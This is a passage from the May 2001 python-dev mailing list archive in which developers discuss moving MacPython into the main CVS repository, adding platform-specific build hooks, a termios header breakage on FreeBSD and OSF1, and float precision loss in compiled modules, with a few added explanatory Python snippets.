of Python does not allow for an easy addition of a platform-dependent 
source file to the core interpreter (or am I missing something?). This is a bit 
of functionality I need to port the various Mac modules to MacOSX-python. The 
platform-dependent source file has various glue routines for turning MacOS error 
codes into exceptions and that sort of stuff.

Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:49:17 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:49:17 +0200
Subject: [Python-Dev] Need a search path for modules in setup.py
Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl>

(Don't worry, this is the last in my flurry of OSX related messages:-)

Life would be a lot simpler for me if setup.py (the one for the main extension 
modules) had a search path for module source files. As Mac modules 
currently live in Python/Mac/Modules (as opposed to Python/Modules), not having 
a search path means I get ugly "../Mac/Modules/foomodule.c" constructs.
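As a rough idea of what such a search path could look like, here is a sketch. It is not Jack's actual setup.py code. MODULE_SEARCH_PATH and find_module_source() are hypothetical, and the exists parameter is only there so the lookup can be exercised without touching the disk.

```python
import os

# Hypothetical search path in the spirit of the message: the usual Modules
# directory first, then Mac/Modules.
MODULE_SEARCH_PATH = ["Modules", os.path.join("Mac", "Modules")]


def find_module_source(filename, search_path=MODULE_SEARCH_PATH,
                       exists=os.path.isfile):
    """Return the first directory/filename in search_path that exists,
    or None if the file is in none of them."""
    for directory in search_path:
        candidate = os.path.join(directory, filename)
        if exists(candidate):
            return candidate
    return None
```

An extension definition could then name just "foomodule.c" and let the lookup find it, instead of spelling out "../Mac/Modules/foomodule.c".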

I have the code for setup.py ready, is it OK if I check it in?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From loewis at informatik.hu-berlin.de  Mon May  7 11:53:54 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 7 May 2001 11:53:54 +0200 (MEST)
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>

> There are two ways I can go about this: start a new MacPython project
> or merge the MacPython stuff into the main Python CVS repository.

There is actually a third option: Use the Python SF project, but
create a new module in the Python CVS repository (so no merging would
be done).

I don't know how much code this is. I'd favour merging the Mac code
into the core distribution. If there are loads of Mac-specific modules
that not every MacPython user needs, it might be advisable to create a
distutils package that contains the extra modules. Such a package
should still live in cvs.python.sourceforge.net:/cvsroot/python.

Just my 0.02EUR,

Martin


From guido at digicool.com  Mon May  7 16:00:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 07 May 2001 09:00:08 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200."
             <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com>

[Jack]
> > There are two ways I can go about this: start a new MacPython project
> > or merge the MacPython stuff into the main Python CVS repository.

We have platform-specific subdirectories for so many projects that
it's a shame we don't have the Mac code in there as well!

The only (small) advantage I can imagine of a separate MacPython
project would be that you (Jack) can more easily give others commit
permission to the Mac tree without giving them commit permission to
all of Python (which requires they gain the trust of a larger group of
Python developers).  Of course, I don't know if you expect much help
from others who are not already Python developers.

[Martin]
> There is actually a third option: Use the Python SF project, but
> create a new module in the Python CVS repository (so no merging would
> be done).

I don't know much about modules, but would this allow Jack to check
out the main code and the MacPython code into a single work directory
(which he needs)?  If so, it may be the best solution.

Note that no matter how you do it, you'll have to submit a tree of RCS
files to the SF sysadmins to load, unless you want to lose years of
MacPython cvs logs...

> I don't know how much code this is. I'd favour merging the Mac code
> into the core distribution. If there are loads of Mac-specific modules
> that not every MacPython user needs, it might be advisable to create a
> distutils package that contains the extra modules. Such a package
> should still live in cvs.python.sourceforge.net:/cvsroot/python.

Undecidedly yours,

(Jack, regarding your Makefile and setup.py changes: I'd wait for
opinions on your patches from Neil and Andrew.  I don't see why
they would have an objection to adding these features, but the
specific implementation you propose might be subject to comments.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Mon May  7 15:04:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 7 May 2001 08:04:15 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <15094.40271.461338.638822@beluga.mojam.com>

    Jack> ... I'd like to move MacPython to sourceforge. There are two ways I
    Jack> can go about this: start a new MacPython project or merge the
    Jack> MacPython stuff into the main Python CVS repository.

I say merge.  

Skip


From nas at python.ca  Mon May  7 15:14:52 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:14:52 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200
References: <20010507094600.217CE312BA0@snelboot.oratrix.nl>
Message-ID: <20010507061452.A23494@glacier.fnational.com>

Jack Jansen wrote:
> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> of Python does not allow for an easy addition of a platform-dependent 
> sourcefile to the core interpreter (or am I missing something?).

No, it's still a big ugly hack. :-)

> This is a bit of functionality I need to port the various Mac
> modules to MacOSX-python. The platform-dependent source file has
> various glue routines for turning MacOS error codes into
> exceptions and that sort of stuff.
> 
> Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?

How would this work?  Would MACHDEP_OBJS be set by an autoconf
substitution?

  Neil


From jack at oratrix.nl  Mon May  7 15:17:18 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:17:18 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Guido van Rossum <guido@digicool.com> ,
	     Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> 
Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>

> We have platform-specific subdirectories for so many projects that
> it's a shame we don't have the Mac code in there as well!

Great! I'll pack up my repository and send it to the 
sourceforge-powers-that-be shortly. The write permission for other MacPython 
developers shouldn't be a problem; I think Just is currently the only person 
with write permission (but I have to check).


> (Jack, regarding your Makefile and setup.py changes: I'd wait for
> opinions on your patches from Neil and Andrew.  I don't see why
> they would have an objection to adding these features, but the
> specific implementation you propose might be subject to comments.)

Definitely. I'll put them up as patches and then see what happens.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From jack at oratrix.nl  Mon May  7 15:27:14 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:27:14 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core 
In-Reply-To: Message by Neil Schemenauer <nas@python.ca> ,
	     Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> 
Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl>

> Jack Jansen wrote:
> > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> > of Python does not allow for an easy addition of a platform-dependent 
> > sourcefile to the core interpreter (or am I missing something?).
> [...]
> > 
> > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
> 
> How would this work?  Would MACHDEP_OBJS be set by an autoconf
> substitution?

Yes, that's what I had in mind (haven't written the code yet). Similar to the 
way DYNLOADFILE is set, but empty for all platforms except for OSX.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From nas at python.ca  Mon May  7 15:30:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:30:42 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200
References: <nas@python.ca> <20010507132714.B0808312BA1@snelboot.oratrix.nl>
Message-ID: <20010507063042.D23494@glacier.fnational.com>

Jack Jansen wrote:
> Yes, that's what I had in mind (haven't written the code yet). Similar to the 
> way DYNLOADFILE is set, but empty for all platforms except for OSX.

Sounds good to me.  Try to keep the code somewhat general so that
other platforms may use it.

  Neil


From mal at lemburg.com  Mon May  7 20:44:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 07 May 2001 20:44:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
	            <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com>
Message-ID: <3AF6ED27.FB2C077B@lemburg.com>

Guido van Rossum wrote:
> 
> > I've attached the patch. Due to a small reorganisation the
> > patch is a little longer -- symmetry has its price at C level
> > too ;-)
> 
> Looks good on paper, so go ahead and check it in.  Watch out for
> potential changes caused by Tim's iter-crusade!  :-)

OK. I'll look into this later this week.
 
> While you're at it, why don't you check in the rot13 codec you posted
> -- it's good to have simple examples in the standard library.
> It would also be cool to have codecs for common file encodings like
> base64, quoted-printable, binhex, uuencode, and even hex
> (binascii.hexlify).

Right. I'll add these in the next few weeks -- as time
permits.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From martin at loewis.home.cs.tu-berlin.de  Mon May  7 23:21:27 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 7 May 2001 23:21:27 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de>

> I don't know much about modules, but would this allow Jack to check
> out the main code and the MacPython code into a single work
> directory (which he needs)?

Using CVS modules allows you to merge parts of the tree into a single
sandbox. E.g. you could do

macpython python/dist/src &Mac

'cvs co macpython' would then give you a dist/src directory, which
also contains a Mac directory (where Mac is another module, alongside
/python, or a CVSROOT/modules entry).

You could use an exclude list, e.g.

macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all
files in a single directory must come from the same CVS module - you
can think of ampersand modules similar to Unix mount(1)ed file
systems.

Regards,
Martin


From tim.one at home.com  Tue May  8 06:14:22 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:14:22 -0400
Subject: [Python-Dev] Help with SF bug 105470
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMFKAAA.tim.one@home.com>

An ancient bug just got (re?)discovered on c.l.py, which I entered into SF:

http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&atid=105470

This has to do w/ gross loss of precision in manifest Python float constants,
if and only if a module is loaded from .pyc or .pyo format.  Since it's
fp-related, and fp is tricky x-platform, I'd like some volunteers to test
this before I check it in.

Current CVS Python contains a dormant test case.  There's a patch attached to
the bug report that activates the test case, and tries to repair the problem.
With the patch applied, the fix works if and only if test_import passes
both after deleting all .pyc/.pyo files first and when run a second time
without deleting them.
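The message doesn't say how the constants lose precision. As an illustration only, assume the value passes through a decimal string somewhere along the way. Then 12 significant digits, which is what str() used for floats in Python of that era, can lose information, while 17 significant digits always round-trip an IEEE-754 double. roundtrip() is a made-up helper.

```python
import math


def roundtrip(x, digits):
    """Write x as text with `digits` significant digits, then read it back."""
    return float("%.*g" % (digits, x))


for value in (0.1 + 0.2, math.pi):
    # Columns: original value, survives 12 digits?, survives 17 digits?
    print(value, roundtrip(value, 12) == value, roundtrip(value, 17) == value)
```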

Works on Win98SE, but you may have already guessed that <wink>.


From tim.one at home.com  Tue May  8 06:52:37 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:52:37 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>

[Jeremy Hylton, on python-checkins]
> ...
> XXX When should nested scopes be made non-optional on the trunk?

Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
having trouble sleeping tonight <wink>.


From thomas at xs4all.net  Tue May  8 12:14:20 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 12:14:20 +0200
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org>
Message-ID: <20010508121420.Y16486@xs4all.nl>

On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote:

> >>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

>     | Why not let us spell this as:
>     | 	class X(Y):
>     | 		from Y import foo as _sfoo, bar as _sbar
>     | 		...

>     NS> This already has a meaning in Python.  Paul's suggested syntax
>     NS> is pretty neat, IMHO.

> Not if Y is a class though, right?  That would currently raise an
> ImportError, ...

Nope:

>>> class string:
...     pass
... 
>>> from string import split
>>> string
<class __main__.string at 8072e90>
>>> 

That could be considered a misfeature for more than one reason (like
importing from non-module objects, which you now do by inserting the object
into sys.modules) but can't be fixed without breaking backward
compatibility, except by inventing new syntax.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From Mark.Favas at per.dem.csiro.au  Tue May  8 12:34:37 2001
From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat))
Date: Tue, 8 May 2001 18:34:37 +0800 
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>

A change to termios.c in the last couple of days to #include termio.h as
well as termios.h breaks the build on FreeBSD, which has only termios.h.
Perhaps this needs an autoconf test? There'll probably be other similar systems.

Cheers, Mark 


From thomas at xs4all.net  Tue May  8 13:36:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 13:36:38 +0200
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>
Message-ID: <20010508133638.Z16486@xs4all.nl>

On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote:

> Given the new dict iterators in 2.2, there's an easier fast way that doesn't
> mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair.
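Python 3 no longer has `dict.iteritems()` or an iterator `.next` method. The two variants translate roughly as follows. This is a sketch, and `d` is just example data:

```python
def arb(d):
    """Tim's version: return an arbitrary (key, value) pair, never mutating d."""
    if d:
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")

d = {"a": 1, "b": 2}

# Each call starts a fresh iterator, so repeated calls return the same pair.
first = arb(d)
second = arb(d)

# Thomas's version: bind __next__ of one long-lived iterator, so each call
# advances to the next pair (and raises StopIteration once it is exhausted).
arb_stateful = iter(d.items()).__next__
pairs = [arb_stateful(), arb_stateful()]
```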

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Tue May  8 14:10:00 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:10:00 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <20010508141000.A16486@xs4all.nl>

On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote:

> The Mac specific stuff for Python is all concentrated in a single subtree Mac 
> of the main Python tree (the subtree has its own hierarchy of 
> Python/Modules/Lib/etc directories), so putting it in the main repository 
> should not pollute the filenamespace all that much. It would also have the 
> advantage that a single "cvs update" would update everything (whereas the 
> current situation for Mac developers, where Python/Mac is from a different 
> CVSROOT than Python, does not have that advantage). The downside is that 
> everyone who does a full checkout of the tree would get an extra 1000 or so 
> files on their disk that are pretty useless unless they have a mac.

I'd say merge, except that the number '1000' is very large. Is it really
1000 ? The current Python tree contains only 304 .c and .h files, about 1000
.py files spread out over the tree (567 of which in Lib, the rest in
Demo/Tools) and obviously some misc files and CVS stuff, for a total of
around 2500 files. Is that 1000 a real number ? No temp files,
auto-generated files, .o files etc ? How large are they ? (the average size
in the current CVS tree is about 10k)
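Thomas's figures are per-extension tallies over a checkout. Here is a minimal standard-library sketch of how such a tally could be produced. Skipping directories named `CVS` is an assumption about what counts as noise, and the file names in `_demo()` are made up:

```python
import os
import tempfile
from collections import Counter

def count_by_extension(root, skip_dirs=("CVS",)):
    """Tally files under root by extension, ignoring VCS bookkeeping dirs."""
    counts = Counter()
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk does not descend into skipped directories.
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            ext = os.path.splitext(name)[1] or "<none>"
            counts[ext] += 1
    return counts

def _demo():
    """Build a tiny throwaway tree and count it."""
    with tempfile.TemporaryDirectory() as root:
        for rel in ("Lib/os.py", "Lib/site.py", "Modules/posixmodule.c",
                    "Lib/CVS/Entries"):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write("")
        return count_by_extension(root)

demo = _demo()
```

On a real checkout, `count_by_extension(path).most_common()` lists the largest groups first. That is the kind of breakdown quoted above.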

I'd probably still say 'merge', I'm just curious where the large number of
files comes from. Is it to keep the changes to the original files minimal ?
Given the number of platform-dependent #ifdefs and differently defined
macros we're using now, I don't see why some of those changes couldn't be
moved into the original files, if that's the case.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Tue May  8 14:13:39 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:13:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200
References: <guido@digicool.com> <20010507131718.C22B7312BA1@snelboot.oratrix.nl>
Message-ID: <20010508141339.B16486@xs4all.nl>

On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote:

> > We have platform-specific subdirectories for so many projects that
> > it's a shame we don't have the Mac code in there as well!

> Great! I'll pack up my repository and send it to the 
> sourceforge-powers-that-be shortly. The write permission for other MacPython 
> developers shouldn't be a problem, I think Just is currently the only person 
> with write permission (but I have to check).

That doesn't mean there isn't a problem. Just doesn't have write access :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido at digicool.com  Tue May  8 15:35:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:35:50 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400."
             <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com>

> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes be made non-optional on the trunk?

[Tim]
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> having trouble sleeping tonight <wink>.

+1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May  8 15:41:42 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:41:42 -0500
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800."
             <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com>

> A change to termios.c in the last couple of days to #include termio.h as
> well as termios.h breaks the build on FreeBSD, which has only termios.h -
> needs an autoconf test? There'll probably be other similar systems.

Frankly, I don't see the point of including termio.h at all -- it
seems to be a backwards compatibility file.

Mark, can you please enter this in the bug database and assign it to
whoever checked in the change? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Tue May  8 16:05:01 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 8 May 2001 07:05:01 -0700
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400
References: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <20010508070501.A25794@glacier.fnational.com>

Tim Peters wrote:
> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes be made non-optional on the trunk?
> 
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> having trouble sleeping tonight <wink>.

Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?

  Neil


From jack at oratrix.nl  Tue May  8 16:07:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue, 08 May 2001 16:07:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> 
Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl>

> I'd say merge, except that the number '1000' is very large. Is it really
> 1000 ? The current Python tree contains only 304 .c and .h files, about 1000
> .py files spread out over the tree (567 of which in Lib, the rest in
> Demo/Tools) and obviously some misc files and CVS stuff, for a total of
> around 2500 files. Is that 1000 a real number ? No temp files,
> auto-generated files, .o files etc ? How large are they ? (the average size
> in the current CVS tree is about 10k)

It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
system), 30 resource files and then assorted things (html documentation, 
scripts to drive the distribution builder, etc).

The .xml and .exp files and about 20 of the .c files are machine generated, so 
they could technically be left out of the repository. The generation process 
of these files is a bit painful, though, so I've added them as a convenience 
(the reasoning is a bit along the lines of the Grammar stuff of the core).

The one thing that I should do is clean out the "Unsupported" directory before 
doing the merge. It contains some stuff that is long dead. But then, it isn't 
all that many files.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From mwh at python.net  Tue May  8 16:41:45 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 8 May 2001 15:41:45 +0100 (BST)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
Message-ID: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>

Guido van Rossum <guido at digicool.com> writes:

> > A change to termios.c in the last couple of days to #include termio.h
> > as well as termios.h breaks the build on FreeBSD, which has only
> > termios.h - needs an autoconf test? There'll probably be other similar
> > systems.
>
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.

If you don't include termio.h the build breaks on alpha/OSF1.  This
sounds to me like OSF1's headers are broken (you can't include
sys/ioctl.h without including termio.h first, it seems, or you get
complaints about struct termio being undefined).  So I'd suggest

+#ifdef __osf__
 #include <termio.h>
+#endif

and then see if the build breaks anywhere else (I love unix).

Using the sf compile farm, I've tested this on FreeBSD, Linux/x86,
Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives
a pile of warnings from redefined macros and then dies 'cause it can't
find a valid license file).

So we might need some more magic for solaris using cc.

Cheers,
M.

-- 
  Imagine if every Thursday your shoes exploded if you tied them
  the usual way.  This happens to us all the time with computers,
  and nobody thinks of complaining.                     -- Jeff Raskin


From fdrake at acm.org  Tue May  8 16:45:18 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
In-Reply-To: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > If you don't include termio.h the build breaks on alpha/OSF1.  This
 > sounds to me like OSF1's headers are broken (you can't include
 > sys/ioctl.h without including termio.h first, it seems, or you get
 > complaints about struct termio being undefined).  So I'd suggest
 > 
 > +#ifdef __osf__
 >  #include <termio.h>
 > +#endif
 > 
 > and then see if the build breaks anywhere else (I love unix).

  Does it make more sense to do this or to test for termio.h in
configure?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas at per.dem.csiro.au  Tue May  8 16:47:39 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Tue, 08 May 2001 22:47:39 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com>
Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au>

Guido van Rossum wrote:
> 
> > A change to termios.c in the last couple of days to #include termio.h as
> > well as termios.h breaks the build on FreeBSD, which has only termios.h -
> > needs an autoconf test? There'll probably be other similar systems.
> 
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.
> 
> Mark, can you please enter this in the bug database and assign it to
> whoever checked in the change? :-)

Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred
Drake <grin>

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From thomas at xs4all.net  Tue May  8 17:52:49 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 17:52:49 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200
References: <thomas@xs4all.net> <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <20010508175248.E16486@xs4all.nl>

On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote:

[ Jack wants to add the +/- 1000 extra files from the MacPython source tree
  to the Python CVS repository ]

> It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
> Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
> system), 30 resource files and then assorted things (html documentation, 
> scripts to drive the distribution builder, etc).

I'd say merge it. If there had been decent CVS clients for the mac when you
started, those files would have been in the CVS tree already. 

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip at pobox.com  Tue May  8 20:22:17 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 8 May 2001 13:22:17 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>
References: <thomas@xs4all.net>
	<20010508141000.A16486@xs4all.nl>
	<20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <15096.14681.773554.729550@beluga.mojam.com>

    Jack> It's actually 830 files. ... 120 .c/.h files ...

How many of those 120 files are variants of existing source files that (in
theory) could be merged with their mainline counterparts?

Skip


From mwh at python.net  Wed May  9 00:27:59 2001
From: mwh at python.net (Michael Hudson)
Date: 08 May 2001 23:27:59 +0100
Subject: [Python-Dev] Recent change to termios module breaks build on  FreeBSD
In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)"
